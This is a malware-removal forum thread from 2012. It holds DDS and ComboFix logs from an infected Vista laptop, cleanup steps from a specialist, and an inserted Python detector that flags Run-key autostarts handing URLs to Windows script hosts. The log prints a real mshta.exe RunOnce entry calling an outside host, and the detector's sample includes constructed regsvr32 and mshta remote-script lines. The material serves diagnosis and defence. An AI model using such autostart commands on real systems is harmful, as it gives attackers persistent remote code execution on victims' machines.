uRunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [Skytel] Skytel.exe
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
LSP: c:\windows\system32\wpclsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
FF - plugin: c:\program files\mozilla firefox\plugins\NPTURNMED.dll
FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
FF - plugin: c:\windows\system32\npDeployJava1.dll
FF - plugin: c:\windows\system32\npmproxy.dll
.
---- FIREFOX POLICIES ----
.
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
R1 MpKsl0ef4776f;MpKsl0ef4776f;c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys [2012-5-28 29904]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
.
=============== Created Last 30 ================
.
2012-05-28 05:57:08 29904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys
2012-05-28 05:06:52 6737808 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\mpengine.dll
2012-05-23 20:07:25 6737808 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2012-05-22 05:16:47 713784 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
2012-05-22 05:09:57 -------- d-----w- c:\program files\Microsoft Security Client
2012-05-19 08:37:25 6737808 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
2012-05-19 05:43:51 -------- d-----w- c:\programdata\vsint
2012-05-14 22:57:56 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57:42 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57:41 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57:34 1404928 ----a-w- c:\program files\common files\microsoft shared\ink\InkObj.dll
2012-05-14 22:57:32 936960 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
2012-05-14 22:57:20 1069056 ----a-w- c:\windows\system32\DWrite.dll
2012-05-14 22:57:19 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57:19 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2012-05-14 22:57:18 683008 ----a-w- c:\windows\system32\d2d1.dll
2012-05-14 22:57:18 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2012-05-14 22:56:51 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56:50 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56:49 2044928 ----a-w- c:\windows\system32\win32k.sys
2012-05-09 04:58:39 592824 ----a-w- c:\program files\mozilla firefox\gkmedias.dll
2012-05-09 04:58:39 44472 ----a-w- c:\program files\mozilla firefox\mozglue.dll
.
==================== Find3M ====================
.
2012-05-05 06:08:36 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2012-05-05 06:08:36 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-04-04 19:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44:12 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44:12 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11:45 5120 ----a-w- c:\windows\system32\wmi.dll
2012-02-29 15:11:42 172032 ----a-w- c:\windows\system32\wintrust.dll
2012-02-29 15:09:53 157696 ----a-w- c:\windows\system32\imagehlp.dll
2012-02-29 13:32:37 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-02-28 11:30:48 916992 ----a-w- c:\windows\system32\wininet.dll
2012-02-28 11:25:41 43520 ----a-w- c:\windows\system32\licmgr10.dll
2012-02-28 11:25:17 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
2012-02-28 11:25:03 71680 ----a-w- c:\windows\system32\iesetup.dll
2012-02-28 11:25:03 109056 ----a-w- c:\windows\system32\iesysprep.dll
2012-02-28 10:07:57 385024 ----a-w- c:\windows\system32\html.iec
2012-02-28 08:12:52 133632 ----a-w- c:\windows\system32\ieUnatt.exe
2012-02-28 08:08:30 1638912 ----a-w- c:\windows\system32\mshtml.tlb
.
============= FINISH: 3:18:17.35 ===============
gagraptor (thread starter), 28-May-2012, 04:29 AM #6
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-08-26.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 7/31/2007 3:06:08 PM
System Uptime: 5/28/2012 1:45:32 AM (2 hours ago)
.
Motherboard: TOSHIBA | | IALAA
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-56 | Socket M2/S1G1 | 1800/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 231 GiB total, 26.845 GiB free.
E: is CDROM ()
F: is CDROM ()
G: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft 6to4 Adapter
Device ID: ROOT\*6TO4MP\0000
Manufacturer: Microsoft
Name: Microsoft 6to4 Adapter
PNP Device ID: ROOT\*6TO4MP\0000
Service: tunnel
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Tun Miniport Adapter
Device ID: ROOT\*TUNMP\0001
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TUNMP\0001
Service: tunmp
.
Class GUID: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Description: Canon MX860 ser Network
Device ID: ROOT\CANON_IJ_NETWORK\0000
Manufacturer: Canon
Name: Canon MX860 ser Network
PNP Device ID: ROOT\CANON_IJ_NETWORK\0000
Service: StillCam
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
µTorrent
Adobe Flash Player 11 Plugin
Adobe Flash Player ActiveX
Adobe Reader 8.1.5
Adobe Shockwave Player
Adobe® Photoshop® Album Starter Edition 3.2
AGEIA PhysX v7.07.09
Akamai NetSession Interface
Akamai NetSession Interface Service
ALPS Touch Pad Driver
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Atheros Driver Installation Program
ATI Catalyst Install Manager
ATI Uninstaller
Bejeweled Deluxe 1.87
Bonjour
Camera Assistant Software for Toshiba
Canon IJ Network Scan Utility
Canon IJ Network Tool
Canon MX860 series MP Drivers
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center Localization Chinese Standard
Catalyst Control Center Localization Chinese Traditional
Catalyst Control Center Localization Dutch
Catalyst Control Center Localization Finnish
Catalyst Control Center Localization French
Catalyst Control Center Localization German
Catalyst Control Center Localization Greek
Catalyst Control Center Localization Hungarian
Catalyst Control Center Localization Italian
Catalyst Control Center Localization Japanese
Catalyst Control Center Localization Korean
Catalyst Control Center Localization Norwegian
Catalyst Control Center Localization Polish
Catalyst Control Center Localization Portuguese
Catalyst Control Center Localization Russian
Catalyst Control Center Localization Spanish
Catalyst Control Center Localization Swedish
Catalyst Control Center Localization Thai
Catalyst Control Center Localization Turkish
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
CD/DVD Drive Acoustic Silencer
CloneDVD2
Counter-Strike 1.0
Counter-Strike 1.6
Counter Strike 1.6 - By PirocaHP.F!N4LShare
Counter Strike 1.6 - Pack 112 Mapas - By PirocaHP F!N4LShare
D3DX10
Dell Driver Download Manager
Dell V305
DivX Converter
DivX Plus DirectShow Filters
DivX Setup
DivX Version Checker
DVD MovieFactory for TOSHIBA
DVDFab (Platinum/Gold/HD Decrypter) (Option: Mobile) 5.0.9.0
EA SPORTS(TM) Cricket 07
EPSON Easy Photo Print
EPSON WorkForce 30 Series Printer Uninstall
Google Chrome
Google Talk (remove only)
Google Talk Plugin
HD Tune 2.55
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
iPhone Configuration Utility
iTunes
Java Auto Updater
Java(TM) 6 Update 29
Java(TM) 7 Update 3
Java(TM) SE Development Kit 7 Update 2
Java(TM) SE Runtime Environment 6
JavaFX 2.0.2 SDK
JavaFX 2.0.3
K-Lite Mega Codec Pack 6.2.0
KB408682
Magic DVD Ripper V5.1.1
Magic ISO Maker v5.5 (build 0272)
Malwarebytes Anti-Malware version 1.61.0.1400
Max Payne
McAfee SiteAdvisor
Media Player Classic - Home Cinema v. 1.3.1249.0
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4 Client Profile
Microsoft Application Error Reporting
Microsoft Flight Simulator X
Microsoft Office XP Professional with FrontPage
Microsoft Primary Interoperability Assemblies 2005
Microsoft Security Client
Microsoft Security Essentials
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Works
Microsoft XML Parser
Mozilla Firefox 11.0 (x86 en-US)
MSVC80_x86
MSVCRT
MSXML 4.0 SP2 (KB927978)
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP2 Parser and SDK
Need for Speed Underground 2
Need for Speed™ Most Wanted
Nero BackItUp
Nero BackItUp and Burn
Nero BurnRights
Nero Express
Nero RescueAgent
neroxml
Oblivion
OGA Notifier 2.0.0048.0
Pando Media Booster
PC Connectivity Solution
PCFriendly
Picasa 2
QuickTime
RealNetworks - Microsoft Visual C++ 2008 Runtime
Realtek 8169 PCI, 8168 and 8101E PCIe Ethernet Network Card Driver for Windows Vista
Realtek High Definition Audio Driver
RealUpgrade 1.1
Safari
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2657424)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
Security Update for Windows Media Encoder (KB2447961)
Security Update for Windows Media Encoder (KB954156)
Security Update for Windows Media Encoder (KB979332)
Segoe UI
Skins
Skype™ 3.5
Spelling Dictionaries Support For Adobe Reader 8
Switch Sound File Converter
Synaptics Pointing Device Driver
Tales of Monkey Island
TeamViewer 6
Texas Instruments PCIxx21/x515/xx12 drivers.
TIPCI
TOSHIBA Assist
TOSHIBA Disc Creator
TOSHIBA DVD PLAYER
TOSHIBA Extended Tiles for Windows Mobility Center
TOSHIBA Flash Cards Support Utility
TOSHIBA Hardware Setup
Toshiba Registration
TOSHIBA SD Memory Utilities
TOSHIBA Software Modem
TOSHIBA Software Upgrades
TOSHIBA Supervisor Password
TOSHIBA Value Added Package
TuneUp Companion 2.2.7
TypingMaster Pro
Unity Web Player
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Utility Common Driver
uTorrentControl Toolbar
VC80CRTRedist - 8.0.50727.6195
VCRedistSetup
Veoh Giraffic Video Accelerator
Veoh Web Player
VeohTV BETA
VideoLAN VLC media player 0.8.6f
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Messenger
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Media Encoder 9 Series
Windows Media Player Firefox Plugin
WinImage
WinRAR archiver
Yahoo! Detect
Yahoo! Install Manager
Yahoo! Messenger
Zeus & Poseidon
.
==== Event Viewer Messages From Past Week ========
.
5/28/2012 12:57:13 AM, Error: Microsoft-Windows-SharedAccess_NAT [31004] - The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.
5/28/2012 1:48:09 AM, Error: Microsoft-Windows-DistributedCOM [10016] - The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
5/28/2012 1:47:38 AM, Error: Service Control Manager [7000] - The Parallel port driver service failed to start due to the following error: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
5/28/2012 1:47:31 AM, Error: PlugPlayManager [12] - The device 'PIONEER DVD-RW DVR-K17LF ATA Device' (IDE\CdRomPIONEER_DVD-RW_DVR-K17LF________________4.53____\5&383a5e59&0&0.0.0) disappeared from the system without first being prepared for removal.
5/28/2012 1:47:27 AM, Error: cdrom [15] - The device, \Device\CdRom0, is not ready for access yet.
5/28/2012 1:47:27 AM, Error: atapi [11] - The driver detected a controller error on \Device\Ide\IdePort2.
5/23/2012 3:53:51 PM, Error: EventLog [6008] - The previous system shutdown at 3:52:17 PM on 5/23/2012 was unexpected.
.
==== End Of File ===========================
gagraptor (thread starter), 28-May-2012, 04:31 AM #7
Also, I don't know if it helps, but my physical memory usage is always above 50%.
Mark1956 (Malware Removal Specialist), 28-May-2012, 04:56 AM #8
Ok, thanks for the logs. Please now follow this to run Combofix and post the log.

IMPORTANT
I see you have a P2P File Sharing Program installed on your system: uTorrent.
As long as you continue to use these types of programs you can expect to get infected.
P2P file sharing is one of the most common sources for picking up infections.
Please uninstall the program from your system in Programs & Features via the Control Panel.
If you insist on keeping it on your system then please DO NOT USE IT until we are finished.

STEP 1
NOTE: If you have already used Combofix please delete the icon from your desktop.
  • Please download DeFogger and save it to your desktop.
  • Once downloaded, double-click on the DeFogger icon to start the tool.
  • The application window will appear.
  • You should now click on the Disable button to disable your CD Emulation drivers.
  • When it prompts you whether or not you want to continue, please click on the Yes button to continue.
  • When the program has completed you will see a Finished! message. Click on the OK button to exit the program.
  • If CD Emulation programs are present and have been disabled, DeFogger will now ask you to reboot the machine. Please allow it to do so by clicking on the OK button.
STEP 2
Please download ComboFix from one of the locations below and save it to your Desktop. <- Important!!! Be sure to print out and follow these instructions: A guide and tutorial on using ComboFix
Vista/Windows 7 users can skip the Recovery Console instructions and use the Windows DVD to boot into the Vista Recovery Environment or Windows 7 System Recovery Options if something goes awry. If you do not have a Windows 7 DVD then please create a Windows 7 Repair Disc. XP users need to install the Recovery Console first.
  • Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results". Click this link to see a list of such programs and how to disable them.
  • If ComboFix detects an older version of itself, you will be asked to update the program.
  • ComboFix will begin by showing a Disclaimer. Read it and click I Agree if you want to continue.
  • Follow the prompts and click on Yes to continue scanning for malware.
  • If using Windows 7 or Vista and you receive a UAC prompt asking if you want to continue running the program, you should press the Continue button.
  • When finished, please copy and paste the contents of C:\ComboFix.txt (which will open after reboot) in your next reply.
  • Be sure to re-enable your anti-virus and other security programs.
-- Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock.
-- ComboFix will temporarily disable your desktop, and if interrupted may leave it disabled. If this occurs, please reboot to restore it.
-- ComboFix disables autorun of all CD, floppy and USB devices to assist with malware removal and increase security.
If you no longer have access to your Internet connection after running ComboFix, please reboot to restore it. If that does not restore the connection, then follow the instructions for Manually restoring the Internet connection provided in the "How to Guide" you printed out earlier.
Quote:
Do NOT use ComboFix unless you have been instructed to do so by a Malware Removal Expert. It is a powerful tool intended by its creator to be used under the guidance and supervision of an expert, NOT for general public or personal use. Using this tool incorrectly could lead to serious problems with your operating system such as preventing it from ever starting again. This site, sUBs and myself will not be responsible for any damage caused to your machine by misusing or running ComboFix on your own. Please read ComboFix's Disclaimer.

Last edited by Mark1956; 28-May-2012 at 05:15 AM..
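The procedure above hands the cleanup to ComboFix. As an added example (not code from the thread, from ComboFix or from DDS), here is the check a responder would run over a ComboFix-style log before and after cleanup: it parses the "Reg Loading Points" sections and flags Run/RunOnce autostarts that hand a URL to a Windows script host, which is how an mshta.exe popup keeps returning after the process is killed. It generalises past mshta to the other script hosts Windows ships (wscript, cscript, rundll32, regsvr32, powershell). The sample log lines are constructed in the thread's log format; the hostnames and value names are placeholders, and treating a trailing `[?]` (no file date/size recorded) as a second signal is this example's interpretation of the log format.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List

# Added example (not code from the thread, ComboFix or DDS). Parses the
# "Reg Loading Points" section of a ComboFix-style log and flags Run-key
# autostarts that hand a URL to a Windows script host. Such an entry needs
# no file on disk: each logon re-fetches the page, which is why killing
# mshta.exe only buys a few minutes. Sample lines below are constructed;
# hostnames (example.invalid) and value names are placeholders.

# Binaries that execute remote or inline script when given a URL.
SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "rundll32", "regsvr32", "powershell"}

SECTION_RE = re.compile(r"^\[(?P<key>HK[^\]]+)\]\s*$")
RUN_KEY_RE = re.compile(r"\\run(once)?$", re.IGNORECASE)
ENTRY_RE = re.compile(
    r'^"(?P<name>[^"]+)"\s*=\s*"(?P<cmd>[^"]*)"\s*(?:\[(?P<meta>[^\]]*)\])?\s*$')
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Finding:
    key: str                      # registry key the value lives under
    name: str                     # value name
    command: str                  # command line as recorded in the log
    reasons: List[str] = field(default_factory=list)

    def remediation(self) -> str:
        """reg.exe command that deletes the value; HKCU entries must be removed as that user."""
        short = (self.key.replace("HKEY_CURRENT_USER", "HKCU")
                         .replace("HKEY_LOCAL_MACHINE", "HKLM"))
        return f'reg delete "{short}" /v "{self.name}" /f'


def launcher(cmd: str) -> str:
    """Base name (no path, no .exe) of the program a command line starts."""
    cmd = cmd.strip()
    if cmd.startswith('"'):                      # quoted path: take what is inside the quotes
        end = cmd.find('"', 1)
        head = cmd[1:end] if end > 0 else cmd[1:]
    else:                                        # unquoted: up to the first ".exe", else first token
        m = re.match(r"(.+?\.exe)(?=\s|$)", cmd, re.IGNORECASE)
        head = m.group(1) if m else (cmd.split(None, 1)[0] if cmd else "")
    base = head.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def scan_run_entries(lines: Iterable[str]) -> List[Finding]:
    """Track the current [HKEY...] section and score every "name"="cmd" [meta] line under Run/RunOnce."""
    findings: List[Finding] = []
    key = ""
    for line in lines:
        sec = SECTION_RE.match(line)
        if sec:
            key = sec.group("key")
            continue
        if not RUN_KEY_RE.search(key):
            continue
        ent = ENTRY_RE.match(line)
        if not ent:
            continue
        cmd, meta = ent.group("cmd"), ent.group("meta")
        reasons = []
        host = launcher(cmd)
        urls = URL_RE.findall(cmd)
        if host in SCRIPT_HOSTS and urls:
            reasons.append(f"{host} is pointed at remote content: {urls[0]}")
        if meta is not None and meta.strip() == "?":
            reasons.append("log records no file date/size for the target ([?])")
        if reasons:
            findings.append(Finding(key, ent.group("name"), cmd, reasons))
    return findings


# Constructed sample in the thread's log format: two benign entries, two malicious.
SAMPLE_LOG = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootAAAA"="mshta.exe http://example.invalid/reg2.php?cccid=AAAA&log=1" [?]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
"Updater"="regsvr32.exe /s /n /u /i:http://example.invalid/u.sct scrobj.dll" [2012-05-01 1024]
'''.strip().splitlines()

if __name__ == "__main__":
    for f in scan_run_entries(SAMPLE_LOG):
        print(f"{f.key}\\{f.name}\n  {f.command}\n  " + "; ".join(f.reasons)
              + f"\n  fix: {f.remediation()}")
```

The same check runs against `reg query` output once ENTRY_RE is adjusted to that tool's column layout. Deleting the value only removes the autostart; whatever wrote it (a dropped DLL, a scheduled task, a second copy under another key) still has to be found, which is what the full ComboFix run is for.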
gagraptor (thread starter), 28-May-2012, 11:02 PM #9
ComboFix 12-05-28.05 - GAGAN 05/28/2012 22:36:29.1.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.999 [GMT -4:00]
Running from: c:\users\GAGAN\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\xp
c:\programdata\xp\EBLib.dll
c:\programdata\xp\TPwSav.sys
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome.manifest
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome\content\overlay.xul
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\install.rdf
c:\windows\system32\CTF
c:\windows\system32\CTF\ctfmon.txt
c:\windows\system32\CTF\Links\OtherProducts.html
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-29 )))))))))))))))))))))))))))))))
.
.
